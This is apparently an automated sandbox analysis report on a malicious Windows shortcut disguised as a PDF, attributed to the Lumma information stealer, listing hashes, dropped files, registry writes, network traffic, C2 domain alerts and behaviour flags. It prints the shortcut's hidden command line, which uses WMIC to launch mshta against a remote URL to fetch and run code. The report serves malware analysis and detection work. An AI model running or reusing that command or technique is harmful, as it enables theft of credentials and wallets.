File name:	Instruction_18112.pdf.lnk
Full analysis:	https://app.any.run/tasks/344d4914-f368-4bda-bdec-76af9c23b662
Verdict:	Malicious activity
Threats:	Lumma is an information stealer, developed using the C programming language. It is offered for sale as a malware-as-a-service, with several plans available. It usually targets cryptocurrency wallets, login credentials, and other sensitive information on a compromised system. The malicious software regularly gets updates that improve and expand its functionality, making it a serious stealer threat. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Malware Trends Tracker >>>
Analysis date:	November 16, 2024, 00:09:29
OS:	Windows 10 Professional (build: 19045, 64 bit)
Tags:	susp-powershell lumma stealer
Indicators:
MIME:	application/x-ms-shortcut
File info:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=11, Unicoded, HasExpIcon "%ProgramFiles%\Microsoft\Edge\Application\msedge.exe", MachineID odafa KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, Archive, ctime=Tue Mar 12 20:03:35 2024, atime=Mon Jun 17 13:07:55 2024, mtime=Tue Mar 12 20:03:35 2024, length=471040, window=showminnoactive, IDListSize 0x0187, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\wbem\WMIC.exe"
MD5:	CDBF2DB8C078C2964D02C7518E3BED81
SHA1:	66AE47E712140F12B25AB027458035ADBF366B44
SHA256:	7EC8D5588CEEC6A3D1242B5F6127D56E50D91AFD33241DAA248B4A797CF8DA19
SSDEEP:	48:88nSJOJjuCf6eHeBsNdo9aQm2V2h5W3b:88nSJAf6eksoJY

Flags:	IDList, LinkInfo, Description, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon
FileAttributes:	Archive
CreateDate:	2024:03:12 20:03:35+00:00
AccessDate:	2024:06:17 13:07:55+00:00
ModifyDate:	2024:03:12 20:03:35+00:00
TargetFileSize:	471040
IconIndex:	11
RunWindow:	Show Minimized No Activate
HotKey:	(none)
TargetFileDOSName:	WMIC.exe
DriveType:	Fixed Disk
DriveSerialNumber:	5823-95DD
VolumeLabel:	System
LocalBasePath:	C:\Windows\System32\wbem\WMIC.exe
Description:	Instruction_18112.pdf
RelativePath:	..\..\..\..\..\..\..\Windows\System32\wbem\WMIC.exe
CommandLineArguments:	/namespace:\\root\cimv2 path Win32_Process call Create "mshta https://cdn-defac18.artcollective-snapclick.com/api/reg/update.json"
IconFileName:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
MachineID:	odafa


(PID) Process:	(860) mshta.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:	write	Name:	CachePrefix
Value:
(PID) Process:	(860) mshta.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:	write	Name:	CachePrefix
Value: Cookie:
(PID) Process:	(860) mshta.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:	write	Name:	CachePrefix
Value: Visited:
(PID) Process:	(6236) powershell.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
Operation:	write	Name:	{2781761E-28E0-4109-99FE-B9D127C57AFE} {56FFCC30-D398-11D0-B2AE-00A0C908FA49} 0xFFFF
Value: 010000000000000020F244D8BB37DB01
(PID) Process:	(2464) dllhost.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:	write	Name:	SlowContextMenuEntries
Value: 6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000

PID	Process	Filename		Type
860	mshta.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8		der
		MD5:971C514F84BBA0785F80AA1C23EDFD79	SHA256:F157ED17FCAF8837FA82F8B69973848C9B10A02636848F995698212A08F31895
6236	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IADZ0U21077H0JD6B4XX.temp		binary
		MD5:C1ACA00C1DBA07C4BC0201F983121572	SHA256:266D6B11EDEC0513C60E40E5F32D0877511E62950A0521C901E819F767D3900E
5832	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0osouae4.03z.ps1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6236	powershell.exe	C:\Users\admin\AppData\Local\a05db3da-2429-4b3d-966f-197d3546dd60\iMazing Mini.exe.config		xml
		MD5:461414C7DFDDB0B5AD15C7EAB99B9817	SHA256:085CCC4FF3F65FEDB3073798EB3BD6BFD6187E64ACE5F6966C21AF8CBB445F8A
5832	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0i30lqnq.vny.psm1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6236	powershell.exe	C:\Users\admin\AppData\Local\Temp\a05db3da-2429-4b3d-966f-197d3546dd60.zip		compressed
		MD5:AF4005FACE8C61382C1EE957D7BE7F8A	SHA256:7BDE9E3490FAD17F786039FDBC0B965EEA6A78A798448777BC379CC90CFA1F04
6236	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms		binary
		MD5:C1ACA00C1DBA07C4BC0201F983121572	SHA256:266D6B11EDEC0513C60E40E5F32D0877511E62950A0521C901E819F767D3900E
6236	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF8cf7e.TMP		binary
		MD5:D040F64E9E7A2BB91ABCA5613424598E	SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
6236	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_shqbqdkd.wn3.ps1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6236	powershell.exe	C:\Users\admin\AppData\Local\a05db3da-2429-4b3d-966f-197d3546dd60\ShellExtiMazingCopyHandler.dll		executable
		MD5:485CD10CC2EED2BA6BA16E6F3E3AF8F3	SHA256:B6B0551830806FF29E8A54ADBB4AF6DE81E0F61604854ACA8E86F0497B58A0C0

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
860	mshta.exe	GET	200	216.58.206.67:80	http://c.pki.goog/r/gsr1.crl	unknown	—	—	whitelisted
4360	SearchApp.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D	unknown	—	—	whitelisted
860	mshta.exe	GET	200	216.58.206.67:80	http://c.pki.goog/r/r4.crl	unknown	—	—	whitelisted
1880	svchost.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D	unknown	—	—	whitelisted
5488	MoUsoCoreWorker.exe	GET	200	23.32.238.145:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
4208	backgroundTaskHost.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D	unknown	—	—	whitelisted
1168	SIHClient.exe	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl	unknown	—	—	whitelisted
1168	SIHClient.exe	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl	unknown	—	—	whitelisted
5488	MoUsoCoreWorker.exe	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:137	—	—	—	whitelisted
6944	svchost.exe	51.124.78.146:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
5488	MoUsoCoreWorker.exe	51.124.78.146:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
7048	RUXIMICS.exe	51.124.78.146:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
860	mshta.exe	104.21.78.162:443	cdn-defac18.artcollective-snapclick.com	CLOUDFLARENET	—	unknown
860	mshta.exe	216.58.206.67:80	c.pki.goog	GOOGLE	US	whitelisted
4360	SearchApp.exe	104.126.37.178:443	www.bing.com	Akamai International B.V.	DE	whitelisted
4360	SearchApp.exe	192.229.221.95:80	ocsp.digicert.com	EDGECAST	US	whitelisted
1880	svchost.exe	20.190.159.73:443	login.live.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted

Domain	IP	Reputation
settings-win.data.microsoft.com	51.124.78.146 40.127.240.158 4.231.128.59	whitelisted
google.com	142.250.181.238	whitelisted
cdn-defac18.artcollective-snapclick.com	104.21.78.162 172.67.223.193	unknown
c.pki.goog	216.58.206.67	whitelisted
www.bing.com	104.126.37.178 104.126.37.171 104.126.37.161 104.126.37.163 104.126.37.131 104.126.37.170 104.126.37.136 104.126.37.152 104.126.37.153	whitelisted
ocsp.digicert.com	192.229.221.95	whitelisted
login.live.com	20.190.159.73 40.126.31.69 20.190.159.23 20.190.159.4 20.190.159.75 40.126.31.73 20.190.159.0 20.190.159.64	whitelisted
th.bing.com	104.126.37.163 104.126.37.186 104.126.37.131 104.126.37.155 104.126.37.168 104.126.37.171 104.126.37.137 104.126.37.139 104.126.37.170	whitelisted
pub.foodie-safari.shop	188.114.96.3 188.114.97.3	unknown
go.microsoft.com	23.218.210.69	whitelisted

PID	Process	Class	Message
2172	svchost.exe	Domain Observed Used for C2 Detected	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fleez-inc .sbs)
3864	rundll32.exe	Domain Observed Used for C2 Detected	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fleez-inc .sbs in TLS SNI)
2172	svchost.exe	Domain Observed Used for C2 Detected	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thicktoys .sbs)
2172	svchost.exe	Domain Observed Used for C2 Detected	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pull-trucker .sbs)
3864	rundll32.exe	Domain Observed Used for C2 Detected	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pull-trucker .sbs in TLS SNI)
2172	svchost.exe	Domain Observed Used for C2 Detected	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bored-light .sbs)
3864	rundll32.exe	Domain Observed Used for C2 Detected	ET MALWARE Observed Win32/Lumma Stealer Related Domain (bored-light .sbs in TLS SNI)
2172	svchost.exe	Domain Observed Used for C2 Detected	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (3xc1aimbl0w .sbs)
2172	svchost.exe	Domain Observed Used for C2 Detected	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (300snails .sbs)
2172	svchost.exe	Domain Observed Used for C2 Detected	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crib-endanger .sbs)

General Info

Instruction_18112.pdf.lnk

CDBF2DB8C078C2964D02C7518E3BED81

66AE47E712140F12B25AB027458035ADBF366B44

7EC8D5588CEEC6A3D1242B5F6127D56E50D91AFD33241DAA248B4A797CF8DA19

48:88nSJOJjuCf6eHeBsNdo9aQm2V2h5W3b:88nSJAf6eksoJY

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Run PowerShell with an invisible window

Changes powershell execution policy (Unrestricted)

Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

Uses AES cipher (POWERSHELL)

Changes powershell execution policy (RemoteSigned)

Downloads the requested resource (POWERSHELL)

Executing a file with an untrusted certificate

Known privilege escalation attack

Connects to the CnC server

LUMMA has been detected (SURICATA)

SUSPICIOUS

Executed via WMI

Base64-obfuscated command line is found

Executable content was dropped or overwritten

The process bypasses the loading of PowerShell profile settings

Starts POWERSHELL.EXE for commands execution

Process drops legitimate windows executable

Cryptography encrypted command line is found

Probably obfuscated PowerShell command line is found

Executes script without checking the security policy

Starts a new process with hidden mode (POWERSHELL)

Starts CMD.EXE for commands execution

BASE64 encoded PowerShell command has been detected

Writes data to a memory stream (POWERSHELL)

Creates new GUID (POWERSHELL)

Writes data into a file (POWERSHELL)

The process drops C-runtime libraries

Starts itself from another location

Contacting a server suspected of hosting an CnC

INFO

Reads security settings of Internet Explorer

Checks proxy server information

The process uses the downloaded file

Reads Internet Explorer settings

Gets data length (POWERSHELL)

The executable file from the user directory is run by the Powershell process

Found Base64 encoded file access via PowerShell (YARA)

Malware configuration

Static information

TRiD

EXIF

LNK

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules